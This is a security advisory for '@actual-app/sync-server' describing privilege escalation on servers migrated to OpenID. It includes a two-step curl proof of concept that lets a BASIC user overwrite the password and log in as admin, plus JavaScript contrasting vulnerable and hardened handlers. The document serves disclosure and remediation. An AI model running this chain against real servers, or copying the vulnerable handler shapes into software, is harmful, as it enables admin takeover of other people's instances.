# Vulnerability Summary: Privilege Escalation on 'change-password' Endpoint of OpenID-Migrated Servers

## Vulnerability Overview

On servers migrated from password authentication to OpenID Connect, any authenticated user (including those with the BASIC role) can escalate privileges to ADMIN. The vulnerability is composed of three weaknesses:

1. The `POST /account/change-password` endpoint lacks authorization checks, allowing any user to overwrite the password hash.
2. After migration, the old password row (the inactive password-auth row) is not deleted, and the login endpoint accepts a client-provided `loginMethod`, which bypasses the server's active authentication configuration.
3. An attacker can combine the two issues above to set a known password and authenticate as the anonymous admin account.

## Impact Scope

* **Affected Versions**: `@actual-app/sync-server`

## Proof of Concept

```bash
# Step 1 - set a known password through the unauthorized change-password endpoint
curl -s -X POST https://<server>/account/change-password \
  -H "Content-Type: application/json" \
  -H "X-Actual-Token: <token>" \
  -d '{"password": "attacker123"}'
# Response: {"status":"ok","data":[]}

# Step 2 - log in via password method to obtain an ADMIN session
curl -s -X POST https://<server>/account/login \
  -H "Content-Type: application/json" \
  -d '{"loginMethod": "password", "password": "attacker123"}'
# Response: {"status":"ok","data":{"token":"<admin token>"}}
```
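The following is an added illustration, not code from `@actual-app/sync-server`, of the two server-side checks whose absence the advisory describes. It models a minimal in-memory server (the `store` shape, the `BASIC`/`ADMIN` roles, the `activeLoginMethod` config field and the toy hash are all assumptions made for this example) and shows the vulnerable handler shape beside a hardened one: the hardened change-password handler requires an ADMIN session and refuses to edit a credential the server no longer uses, the hardened login handler takes the authentication method from server configuration rather than from the request body, and the migration routine removes the stale password row.

```javascript
// Added example, not the project's code. All names below are assumptions.

// Toy hash so the example runs offline; a real server uses bcrypt/argon2.
function hash(pw) {
  let h = 0;
  for (const ch of pw) h = (h * 31 + ch.charCodeAt(0)) >>> 0;
  return `toy$${h}`;
}

// Constructed server state: auth migrated to OpenID, but the inactive
// password row was left behind, mirroring weakness 2 in the advisory.
function makeStore() {
  return {
    config: { activeLoginMethod: 'openid' },
    auth: [
      { method: 'password', passwordHash: hash('old-pw'), active: false },
      { method: 'openid', active: true },
    ],
    // Session token -> role of the user holding it.
    sessions: { 'basic-token': { role: 'BASIC' }, 'admin-token': { role: 'ADMIN' } },
  };
}

// ---- Vulnerable shape (what the advisory describes) ----

// Only authentication is checked, never authorization: any session may overwrite the hash.
function changePasswordVulnerable(store, token, body) {
  if (!store.sessions[token]) return { status: 'error', reason: 'unauthenticated' };
  const row = store.auth.find(r => r.method === 'password');
  if (!row) return { status: 'error', reason: 'no-password-row' };
  row.passwordHash = hash(body.password);
  return { status: 'ok' };
}

// Trusts the client's loginMethod instead of the server's active configuration.
function loginVulnerable(store, body) {
  const method = body.loginMethod; // client-controlled
  const row = store.auth.find(r => r.method === method);
  if (method === 'password' && row && row.passwordHash === hash(body.password)) {
    return { status: 'ok', role: 'ADMIN' }; // password login maps to the admin identity
  }
  return { status: 'error', reason: 'invalid' };
}

// ---- Hardened shape ----

function changePasswordHardened(store, token, body) {
  const session = store.sessions[token];
  if (!session) return { status: 'error', reason: 'unauthenticated' };
  if (session.role !== 'ADMIN') return { status: 'error', reason: 'forbidden' };
  // Never edit a credential that the active configuration does not use.
  if (store.config.activeLoginMethod !== 'password') {
    return { status: 'error', reason: 'password-auth-disabled' };
  }
  const row = store.auth.find(r => r.method === 'password' && r.active);
  if (!row) return { status: 'error', reason: 'no-password-row' };
  row.passwordHash = hash(body.password);
  return { status: 'ok' };
}

function loginHardened(store, body) {
  const method = store.config.activeLoginMethod; // server-controlled
  if (body.loginMethod && body.loginMethod !== method) {
    return { status: 'error', reason: 'login-method-not-active' };
  }
  // OpenID logins go through the provider redirect flow, which is out of scope here.
  if (method !== 'password') return { status: 'error', reason: 'use-openid-flow' };
  const row = store.auth.find(r => r.method === 'password' && r.active);
  if (row && row.passwordHash === hash(body.password)) return { status: 'ok', role: 'ADMIN' };
  return { status: 'error', reason: 'invalid' };
}

// Migration should drop the credential rows of the method being retired.
function migrateToOpenId(store) {
  store.auth = store.auth.filter(r => r.method !== 'password');
  store.config.activeLoginMethod = 'openid';
  return store.auth.length;
}

// Runs the advisory's chain against both shapes and reports the outcome.
function demo() {
  const v = makeStore();
  changePasswordVulnerable(v, 'basic-token', { password: 'attacker123' });
  const vulnRole = loginVulnerable(v, { loginMethod: 'password', password: 'attacker123' }).role;
  const h = makeStore();
  const hardenedChange = changePasswordHardened(h, 'basic-token', { password: 'attacker123' }).reason;
  const hardenedLogin = loginHardened(h, { loginMethod: 'password', password: 'attacker123' }).reason;
  return { vulnRole, hardenedChange, hardenedLogin };
}
```

Two points worth noting in the hardened version: the role check alone would not be enough, because an ADMIN session could still revive the inactive password row, so the handler also consults the active configuration; and `loginHardened` treats a client-supplied `loginMethod` purely as something to validate against the server's setting, never as something to act on.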